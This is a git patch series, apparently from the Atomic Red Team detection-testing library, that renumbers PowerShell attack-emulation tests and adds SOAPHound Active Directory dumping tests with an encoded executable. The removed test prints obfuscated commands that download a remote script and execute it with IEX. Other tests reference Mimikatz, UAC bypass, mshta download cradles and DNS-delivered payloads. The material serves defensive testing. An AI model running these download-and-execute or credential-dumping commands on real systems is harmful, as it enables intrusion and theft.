Records [windows] + - Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows] + - Atomic Test #5: Invoke-AppPathBypass [windows] + - Atomic Test #6: Powershell MsXml COM object - with prompt [windows] + - Atomic Test #7: Powershell XML requests [windows] + - Atomic Test #8: Powershell invoke mshta.exe download [windows] + - Atomic Test #9: Powershell Invoke-DownloadCradle [windows] + - Atomic Test #10: PowerShell Fileless Script Execution [windows] + - Atomic Test #11: NTFS Alternate Data Stream Access [windows] + - Atomic Test #12: PowerShell Session Creation and Use [windows] + - Atomic Test #13: ATHPowerShellCommandLineParameter -Command parameter variations [windows] + - Atomic Test #14: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows] + - Atomic Test #15: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] + - Atomic Test #16: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] + - Atomic Test #17: PowerShell Command Execution [windows] + - Atomic Test #18: PowerShell Invoke Known Malicious Cmdlets [windows] + - Atomic Test #19: PowerUp Invoke-AllChecks [windows] + - Atomic Test #20: Abuse Nslookup with DNS Records [windows] - [T1559 Inter-Process Communication](../../T1559/T1559.md) - Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows] - Atomic Test #2: Cobalt Strike Lateral Movement (psexec_psh) pipe [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index f770d1e53d..29c7a31ce4 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -50754,21 +50754,6 @@ execution: ' name: powershell - - name: Obfuscation Tests - auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804 - description: 'Different obfuscated methods to test. Upon execution, reaches - out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM - REMOTE LOCATION" - - ' - supported_platforms: - - windows - executor: - command: | - (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) - (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() - Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value))) - name: powershell - name: Mimikatz - Cradlecraft PsSendKeys auto_generated_guid: af1800cf-9f9d-4fd1-a709-14b1e6de020d description: 'Run mimikatz via PsSendKeys. Upon execution, automated actions diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml index 1aa5cd79a6..28a032034a 100644 --- a/atomics/Indexes/windows-index.yaml +++ b/atomics/Indexes/windows-index.yaml @@ -41909,21 +41909,6 @@ execution: ' name: powershell - - name: Obfuscation Tests - auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804 - description: 'Different obfuscated methods to test. Upon execution, reaches - out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM - REMOTE LOCATION" - - ' - supported_platforms: - - windows - executor: - command: | - (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) - (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() - Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value))) - name: powershell - name: Mimikatz - Cradlecraft PsSendKeys auto_generated_guid: af1800cf-9f9d-4fd1-a709-14b1e6de020d description: 'Run mimikatz via PsSendKeys. Upon execution, automated actions diff --git a/atomics/T1059.001/T1059.001.md b/atomics/T1059.001/T1059.001.md index 59addb05dc..dc18799341 100644 --- a/atomics/T1059.001/T1059.001.md +++ b/atomics/T1059.001/T1059.001.md @@ -16,41 +16,39 @@ PowerShell commands/scripts can also be executed without directly invoking the < - [Atomic Test #3 - Run Bloodhound from Memory using Download Cradle](#atomic-test-3---run-bloodhound-from-memory-using-download-cradle) -- [Atomic Test #4 - Obfuscation Tests](#atomic-test-4---obfuscation-tests) +- [Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys](#atomic-test-4---mimikatz---cradlecraft-pssendkeys) -- [Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys](#atomic-test-5---mimikatz---cradlecraft-pssendkeys) +- [Atomic Test #5 - Invoke-AppPathBypass](#atomic-test-5---invoke-apppathbypass) -- [Atomic Test #6 - Invoke-AppPathBypass](#atomic-test-6---invoke-apppathbypass) +- [Atomic Test #6 - Powershell MsXml COM object - with prompt](#atomic-test-6---powershell-msxml-com-object---with-prompt) -- [Atomic Test #7 - Powershell MsXml COM object - with prompt](#atomic-test-7---powershell-msxml-com-object---with-prompt) +- [Atomic Test #7 - Powershell XML requests](#atomic-test-7---powershell-xml-requests) -- [Atomic Test #8 - Powershell XML requests](#atomic-test-8---powershell-xml-requests) +- [Atomic Test #8 - Powershell invoke mshta.exe download](#atomic-test-8---powershell-invoke-mshtaexe-download) -- [Atomic Test #9 - Powershell invoke mshta.exe download](#atomic-test-9---powershell-invoke-mshtaexe-download) +- [Atomic Test #9 - Powershell Invoke-DownloadCradle](#atomic-test-9---powershell-invoke-downloadcradle) -- [Atomic Test #10 - Powershell Invoke-DownloadCradle](#atomic-test-10---powershell-invoke-downloadcradle) +- [Atomic Test #10 - PowerShell Fileless Script Execution](#atomic-test-10---powershell-fileless-script-execution) -- [Atomic Test #11 - PowerShell Fileless Script Execution](#atomic-test-11---powershell-fileless-script-execution) +- [Atomic Test #11 - NTFS Alternate Data Stream Access](#atomic-test-11---ntfs-alternate-data-stream-access) -- [Atomic Test #12 - NTFS Alternate Data Stream Access](#atomic-test-12---ntfs-alternate-data-stream-access) +- [Atomic Test #12 - PowerShell Session Creation and Use](#atomic-test-12---powershell-session-creation-and-use) -- [Atomic Test #13 - PowerShell Session Creation and Use](#atomic-test-13---powershell-session-creation-and-use) +- [Atomic Test #13 - ATHPowerShellCommandLineParameter -Command parameter variations](#atomic-test-13---athpowershellcommandlineparameter--command-parameter-variations) -- [Atomic Test #14 - ATHPowerShellCommandLineParameter -Command parameter variations](#atomic-test-14---athpowershellcommandlineparameter--command-parameter-variations) +- [Atomic Test #14 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments](#atomic-test-14---athpowershellcommandlineparameter--command-parameter-variations-with-encoded-arguments) -- [Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments](#atomic-test-15---athpowershellcommandlineparameter--command-parameter-variations-with-encoded-arguments) +- [Atomic Test #15 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations](#atomic-test-15---athpowershellcommandlineparameter--encodedcommand-parameter-variations) -- [Atomic Test #16 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations](#atomic-test-16---athpowershellcommandlineparameter--encodedcommand-parameter-variations) +- [Atomic Test #16 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments](#atomic-test-16---athpowershellcommandlineparameter--encodedcommand-parameter-variations-with-encoded-arguments) -- [Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments](#atomic-test-17---athpowershellcommandlineparameter--encodedcommand-parameter-variations-with-encoded-arguments) +- [Atomic Test #17 - PowerShell Command Execution](#atomic-test-17---powershell-command-execution) -- [Atomic Test #18 - PowerShell Command Execution](#atomic-test-18---powershell-command-execution) +- [Atomic Test #18 - PowerShell Invoke Known Malicious Cmdlets](#atomic-test-18---powershell-invoke-known-malicious-cmdlets) -- [Atomic Test #19 - PowerShell Invoke Known Malicious Cmdlets](#atomic-test-19---powershell-invoke-known-malicious-cmdlets) +- [Atomic Test #19 - PowerUp Invoke-AllChecks](#atomic-test-19---powerup-invoke-allchecks) -- [Atomic Test #20 - PowerUp Invoke-AllChecks](#atomic-test-20---powerup-invoke-allchecks) - -- [Atomic Test #21 - Abuse Nslookup with DNS Records](#atomic-test-21---abuse-nslookup-with-dns-records) +- [Atomic Test #20 - Abuse Nslookup with DNS Records](#atomic-test-20---abuse-nslookup-with-dns-records)
@@ -175,37 +173,7 @@ Remove-Item $env:Temp\*BloodHound.zip -Force

-## Atomic Test #4 - Obfuscation Tests -Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" - -**Supported Platforms:** Windows - - -**auto_generated_guid:** 4297c41a-8168-4138-972d-01f3ee92c804 - - - - - - -#### Attack Commands: Run with `powershell`! - - -```powershell -(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) -(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() -Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value))) -``` - - - - - - -
-
- -## Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys +## Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. **Supported Platforms:** Windows @@ -233,7 +201,7 @@ $url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b10

-## Atomic Test #6 - Invoke-AppPathBypass +## Atomic Test #5 - Invoke-AppPathBypass Note: Windows 10 only. Upon execution windows backup and restore window will be opened. Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ @@ -263,7 +231,7 @@ Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githu

-## Atomic Test #7 - Powershell MsXml COM object - with prompt +## Atomic Test #6 - Powershell MsXml COM object - with prompt Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed. Provided by https://github.com/mgreen27/mgreen27.github.io @@ -298,7 +266,7 @@ powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.S

-## Atomic Test #8 - Powershell XML requests +## Atomic Test #7 - Powershell XML requests Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed. Provided by https://github.com/mgreen27/mgreen27.github.io @@ -333,7 +301,7 @@ Provided by https://github.com/mgreen27/mgreen27.github.io

-## Atomic Test #9 - Powershell invoke mshta.exe download +## Atomic Test #8 - Powershell invoke mshta.exe download Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!". Provided by https://github.com/mgreen27/mgreen27.github.io @@ -368,7 +336,7 @@ C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}'

-## Atomic Test #10 - Powershell Invoke-DownloadCradle +## Atomic Test #9 - Powershell Invoke-DownloadCradle Provided by https://github.com/mgreen27/mgreen27.github.io Invoke-DownloadCradle is used to generate Network and Endpoint artifacts. @@ -394,7 +362,7 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.

-## Atomic Test #11 - PowerShell Fileless Script Execution +## Atomic Test #10 - PowerShell Fileless Script Execution Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that art-marker.txt is in the folder. @@ -430,7 +398,7 @@ Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore

-## Atomic Test #12 - NTFS Alternate Data Stream Access +## Atomic Test #11 - NTFS Alternate Data Stream Access Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed. **Supported Platforms:** Windows @@ -481,7 +449,7 @@ Write-Host Prereq's for this test cannot be met automatically

-## Atomic Test #13 - PowerShell Session Creation and Use +## Atomic Test #12 - PowerShell Session Creation and Use Connect to a remote powershell session and interact with the host. Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed. @@ -537,7 +505,7 @@ Enable-PSRemoting

-## Atomic Test #14 - ATHPowerShellCommandLineParameter -Command parameter variations +## Atomic Test #13 - ATHPowerShellCommandLineParameter -Command parameter variations Executes powershell.exe with variations of the -Command parameter **Supported Platforms:** Windows @@ -585,7 +553,7 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

-## Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments +## Atomic Test #14 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied **Supported Platforms:** Windows @@ -634,7 +602,7 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

-## Atomic Test #16 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations +## Atomic Test #15 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations Executes powershell.exe with variations of the -EncodedCommand parameter **Supported Platforms:** Windows @@ -682,7 +650,7 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

-## Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments +## Atomic Test #16 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied **Supported Platforms:** Windows @@ -731,7 +699,7 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

-## Atomic Test #18 - PowerShell Command Execution +## Atomic Test #17 - PowerShell Command Execution Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. **Supported Platforms:** Windows @@ -764,7 +732,7 @@ powershell.exe -e #{obfuscated_code}

-## Atomic Test #19 - PowerShell Invoke Known Malicious Cmdlets +## Atomic Test #18 - PowerShell Invoke Known Malicious Cmdlets Powershell execution of known Malicious PowerShell Cmdlets **Supported Platforms:** Windows @@ -801,7 +769,7 @@ foreach ($cmdlets in $malcmdlets) {

-## Atomic Test #20 - PowerUp Invoke-AllChecks +## Atomic Test #19 - PowerUp Invoke-AllChecks Check for privilege escalation paths using PowerUp from PowerShellMafia **Supported Platforms:** Windows @@ -831,7 +799,7 @@ Invoke-AllChecks

-## Atomic Test #21 - Abuse Nslookup with DNS Records +## Atomic Test #20 - Abuse Nslookup with DNS Records Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts. [reference](https://twitter.com/jstrosch/status/1237382986557001729) From 8f71cf4d53567b0a46dbb97b78ca59c38c8f6288 Mon Sep 17 00:00:00 2001 From: Michael Haag <5632822+MHaggis@users.noreply.github.com> Date: Thu, 22 Feb 2024 10:36:17 -0700 Subject: [PATCH 03/41] SOAPHound (#2689) * SOAPHound * Updates --------- Co-authored-by: Carrie Roberts --- atomics/T1059.001/T1059.001.yaml | 75 ++++++++++++++++++++++++++++ atomics/T1059.001/bin/SOAPHound.exe | Bin 0 -> 573952 bytes 2 files changed, 75 insertions(+) create mode 100644 atomics/T1059.001/bin/SOAPHound.exe diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index 89ee87a182..a91f37080e 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml @@ -405,3 +405,78 @@ atomic_tests: function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")} powershell .(nslookup -q=txt example.com 8.8.8.8)[-1] name: powershell +- name: SOAPHound - Dump BloodHound Data + description: | + Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory. + src: https://github.com/FalconForceTeam/SOAPHound + supported_platforms: + - windows + input_arguments: + user: + description: Username for authentication + type: string + default: $env:USERNAME + password: + description: Password for authentication + type: string + default: P@ssword1 + domain: + description: Domain for authentication + type: string + default: $env:USERDOMAIN + dc: + description: Domain Controller IP + type: string + default: 10.0.1.14 + cachefilename: + description: Cache filename + type: string + default: c:\temp\cache.txt + outputdirectory: + description: Output directory + type: string + default: c:\temp\test2 + soaphound_path: + description: Path to SOAPHound binary + type: string + default: PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe + executor: + command: | + #{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory} + name: powershell +- name: SOAPHound - Build Cache + description: | + Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename. + src: https://github.com/FalconForceTeam/SOAPHound + supported_platforms: + - windows + input_arguments: + user: + description: Username for authentication + type: string + default: $env:USERNAME + password: + description: Password for authentication + type: string + default: P@ssword1 + domain: + description: Domain for authentication + type: string + default: $env:USERDOMAIN + dc: + description: Domain Controller IP + type: string + default: 10.0.1.14 + cachefilename: + description: Cache filename + type: string + default: c:\temp\cache.txt + soaphound_path: + description: Path to SOAPHound binary + type: string + default: PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe + executor: + command: | + #{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename} + name: powershell + diff --git a/atomics/T1059.001/bin/SOAPHound.exe b/atomics/T1059.001/bin/SOAPHound.exe new file mode 100644 index 0000000000000000000000000000000000000000..7c84163f21c9ea5cd33cfa9751da3891efc6fa77 GIT binary patch literal 573952 zcmeFa33wCL_y3*q&0?|G@pt*M#j+V^`q!L~e}5>2cVgz&M9ccPebqL{blO*~=dB|{S>tr= z7JcxTtf7O)j@8Cz4H=%LPZ*mua%@(sE`NUmreNgCeEXVlm2K`xSaE+1qsJO67`w?eJ%{ z#9B&ME0$!x6=i3&T!+|>?6X)_ow#bjaJce^R9~^(qWCkcMKP!xe|4*^m<0f;Ee0$A zpxp_;0stDJ04x9?UIADDKs5`%0)RsT766bPp}_(G%0d7Z08|NB0B}jb0ssn81YrRn zK>`*45+z^(pn?P}WLSO3r0P#CLF==lG)noLTH-dGd`>M%GMs!)E%6vmK3goFIZ9G_0B{#V_fWr=VOAkVOQkT>O%>s9>uLx?$a7UESvDx5Pu$cb~etLI8#j$ zlYj5R9ZVz(ULVR-^*G#)%(3~ya2%K4KKL`@Gy4q7AJ0C0g2%{5N6n4%K~ftnBtttG zB7Os|CHNAN)kdNnIq{|)7=w}xnFXI7BrrTT5~d@{STeh;6k7}2Hb zYuKG;@N}KcW>?jBFwf9G<#T47Ucp8NGF82;5L|jl2*|z=67=0dNYuX}!DS?_A0^IX z4=2u76WzaI8VWWuvwSieK#h`lBcH1n$xGEmDWw_7PS^Xfe^pUh*%|ts>_#$|3PII3 z2*IVF5<Li={-SwB zq}wCQC|QhZvUky24KZ>LJ-zIp~Cio04lzJs66%)Ge zIQ74Mmb&WS^x28HB>cC}a$7RSwJZBw^2WJGJ za8RUsXg4W_48^L3-%|L|Kdat`qQsN|HY@wBdUxr}OSS6#!;S>2K1VuotzIa85OJo! z`FX@y17)`Ieoa#QhiyZ8>{b!C3kEH zja}8MM~AwAvKFB#=X-^amY*Pm%=qRnBBxH@H3*ZFWaXr%7%6AyQ4A{c<8hSKpg5gg zPh6mn+aa`6w=>BR722&*uM^4lINfn>C8bY(qT9)(&zbVbAZ~S3Zy70W4C7LId*UcS z!E)W6hWz8s3C0QKZ?l}oG1E8g%*m6?l#N-(^tN-ru5PohCH z4C<*M@?FvEaUU6_YAN=R3)i?}~1>JCXBU(Ufl)#GPcycLlc_`G&qb5&7|8ANt(N=y9(DynyF4?5I5>O+!j;aRZ%BZDL}z;89CDAmYqRFXiity zOQtQ|>&c9yEz6x=K5bd1w57W0JN8U)UjwULm(x2e7@-R zvXE$UdAgryrSjBX5!73rHX@o*o{j@`r$yS9zLG$C1Oz4!}vbhJ0g%@8YRedf*eIX7!s7K;fe7Oj7 zvV*6(z68GF8eCn=1I(?ep9XRZmzE!8JK&X`(fp*v-vYz5{P!A$WBTg=fXjVM8rIP= zFqq^2|HAd6?UmOHoBkWp{GVMgY9mL%rlt!FCoAG z*IqGf`dG@CamnE91kIO>#{Yl4WZ3l0$hePkY}3Do74 zFCGFPAZ)&R2&`5@6EiL!g0v!HTtA2eio@5Bf~#FWYOe2scP)-yn%Sy;uq+e9q)YV|gj(TZW7Y7yQ1R#c>Vau^mZs9Z3*9f`?!$r` zL3fI;KBz6!07umaZB^0m%tpSf(J4YN$01C2ervbRY$4nbM9t+7l}!A8%$? zx;F^;kPDSB_5RM8@jfI$wXxHO$c?g5ENO^eMV!fMvMV{>rr}OY@pT5vi?n!4 zq!dxUxY-vzDKk+YG1=bC{*P;2kP`hAY0w~3jOJh$Noe#b3d^RUIF;N1;>>zt6(LWM z%>G(e1WOPuZ=8k_R$an{n=8IGRs)#=sEYm>B4Pu1F01~fOc#=c$dzKucn~>?R*AP3 zk%P-AH`{8Zb|w7H9>`md$}(?CZe1r?eM%CC2wlOdI78hjZzy?tAQ4VSsE2fmBFuGI zQ;KmPVPrkGu1!PqkrMn?+Vn#&8+th5Hpz~JlU^}88-h{==Ar`sI;ii8FjTpJA13RH zFw_uoNB?C!HVw-PN-kQA7iVfQU8=}JLb|J!vxhv8zQ~pcQ=B7ou+*Rwqp46nG1XLx zF}&EV)*?EIChQcBfMV1TD@6RM^{tIWF6z!&gjEN-wTP<2*BEB0Z^l^Wp}EmNo3A>U z-B$z0Sh}rNtVNUtx*vc@4ODg?;pmCF%&`_x9S9G%;kXeVKEszPHy5dF!bYeb$km)( zS%wS42O^;I$wR)Vnn|Y_DB{N&jmXBYaicuI_$3L`;!yHukCsah|@>I(R=&U6!` zct!6GKd0uBOMg7BJGHM6SfO#3R-}4EGjHF?#H5%quZpO&J^;rf3yk^z*f8>ro+1Vv ztCyQBr7Z@{$ZDx(Y0#UO?l`S(^jr)jvM~Bm6u1p#LsVA!GDoKq15)H>=VT?1U7rf>w)^_a@MWnwmZ!$iotDC7;E4^iON!+}pr`m6o=PjZ z^&wD6@NyUyU<4K`JV|b>-7Lm3&n?glFU>e-jV$;AcDRUML=nYC6%nouBF<2u4VRQq za~xfvM_?gdredT_h3Zzd!|>79Q=S}1d2Usw8@Z)ctD$bOtfOcRV8QLuZictiKY2C% zS)?ED&>E9|yfy&(GMTf=ClgmeXbIc2uOXm40k=bI%15$5TNMOVe1l*rLDaS$pN^zb zmB;x8YUyL(!{!g?ckIKzRF}EV4<2kIp7ARnUXb5uc($P#sHDjS#*D2e$W}^Uy!WS8$ z_HX3JL-|RgIY|umaz)bJ8Jf8+{VobiZQQS;Bb%D58r%UBSW=~4>vCvrw9;hXFbdUQ zxOlZQ-l^|`32iue)Nm%*#6o(iL;DN~a{9*6F;3fqlkavM0(z8>gBu_%78u?=Or&al zYoYAWD$oM~EYX&EG4Y8J>#St@sy-$Y949hCy`@p@%a<>sC0fiK#^~C&!In{OR*TPa z#3Jk4Zo$S5O9hl$vMV$KR^okQp{t=!s@knMpj%HwJ0D3Ry0v~FTpD%Io2!%BC>*NL z1w&Q!Bk)$JuLbg)I>v@^u7DHi8x2pFBRALS(8fT_O>;Utj%>F>Lu6R+bvxWn%pNp2 z0#2tRg(bv_B2e@07QG8qZj6)85K5YQOidcHd&X%x8Ho$zB*oEMzlvs7y(;GBs&718 zI8DH5MkN%iZz6#>-z1#!-iO_|GB2*Ka{TRzP@=JLGsLLZQMMV6-RidMLr8&IBA)F~ zQ;g#*Y8Won+`1x+ixCft9+%Z^I5~{V9Oh1h$uYtUS!QFh%tkzJs43~zB3u>iwF~r7 zl&g5oRb+I=WdXHdw;CSSB3wxAzLrR2ppL%ysv%PTDuhuqjV6nh6jeHCJ}5xC?o_ed zvqX*^Z&>R7EaeAcrYBj^1!?YYw|rvbeTr_I>U9P8z=6h0Z3I(2N^iqbAiKxzMFYFZ zZFk4Ar$^D>r6gOq#Uv?w(hpIwPexc#tPZQ&5v?Igg9}-V5$;&5V8*&*QBN3t)q*E7 zJIaS`$6*W)+YAHr$n9$;wA4z?lpefYVv-gn>3UKIg{m4R89E-J(4+deFv6Clrh?JK z0%0mMUhgRwJqj>bqCQHn3K3ROFBQxkVM+RY!D!{&2%D@wFBq+h8_cV}DOe;^nU(b; zf<>~GnW~=`ERr$oG_YrKJ|bDm%+ON>%Z$X4rPmRxT7*^C+X!||gw@dd3zi*WIl3-b z%?R`94+vH(!u<5*7ovFu4_|RS5(Vm-JDccbJU_&^ zt$3VPJa`jrObmHW4&+Gb?Q$sGtD5;QUB2w6XPHmp9?p&bp=U6)QA4Y6bcLS9F+TJh zjtQaFIC|`%=jjw1T08c*Wj6727XqSqoB4!--Q^G5158#A0!}Ff)fAYM?VV?Imv)=vk*HaNW-ypf&Jo#3%>ChG}jiv?0e4VMZA!hFwpbZ;M!#0xGhEsb8 zHbmR;snUj^(uUKAYEeBNX=7B_hKFs$X*1w2+6i@Tkq$wnjW}T=S=yK#wvo&>&{$@| zh|y+fBZ;tLaKlVB+~ILrDoHz=!*(hOJF(gUG2qa< z0hYE9?!q5WTHt=tnzaVgr{bz;4_J7^T(9rvKiMAANHe#`P zwMXcbtj!UwM{)A!hvwo`I*(-4=C5xpLd15PuMpv}_R20RuWH(Sn1%=ZKf=y@GN6|r zE7}4U=a9INM6b4pPFcAaC^X!wVRrZ!0Uzea0sq9zGFtmmvaQAK5KXqNxC5Q+#hoan zBSh-)Mnfw&t-dD^uoxLJ_M})X87KqHhtVTQK~*yU%y(cvex~<2)p8QIXg9+2ag?E0 ze@Mp0dRhji`^H$y>u3v}a9Ee4brpD!?{xfaKx$J_&{Ob7dj#&a;bk5CO|V-m^eFKV z{@N)P%U1lgK%i~-YmIJu0)LxOg}JK5@(lhOqxo;bUjsDYr}2m3%HmZ|w8qI=N#v@i zEt1}lTBeo719fTMnu4rq%W#NyCi|A-oZH7KZnONzQ$k#B2Wu#V_dc@4y_}{Cc^5pj zaU|;ps0v1t=+(yJRNR`%Foh#cQBS;y)W{@=h*MHbQ9nuXKZQf_4HPW%PYxFxMxlxb zX-~s*JZ#4B7P1wjUmXYi7{xmrQbWo#?n1Pca1?hYGjKcuhbNX+NeU1)azj?!#ZXv9 z+FcDt*epHsR*Jh3E^3csMsvIm5V4Ln1P?l<3{0up*C-on5e49zT~R;=h?J7Gh+^XM z$=1)w5)(yLSr*j-RG=&Y5lQ8NmH%lZWzmsTk&zT!5lQO6)PEXDjT%PXi=3p&NcN#g zM&~4BV8%a-gMO48MUg}zIi^JB{==5EGCJz2GU^*lQAfw>{9lN5 zYjms`GSHjvy56i{qk}=xNG0w&X%82p%e;Z??oanNTmod)4l`fpej7W@s z*LU&G)IaRIqsk>CK_$Y;fx%7E5yjZ*)+ zGWdxSCN9F zc;KM~<>^LorXtM0YHh>HMVcfd%`!zARJg}+QPh=DPyDx0Z!Z_MM@GGZVw0E1hr+!q zrTK%AZuUty_DQB`mG1YU44=aVKJOonvh~OS&0EFXB{Nwjs-ihj7sAcHa$U`+ipYiM 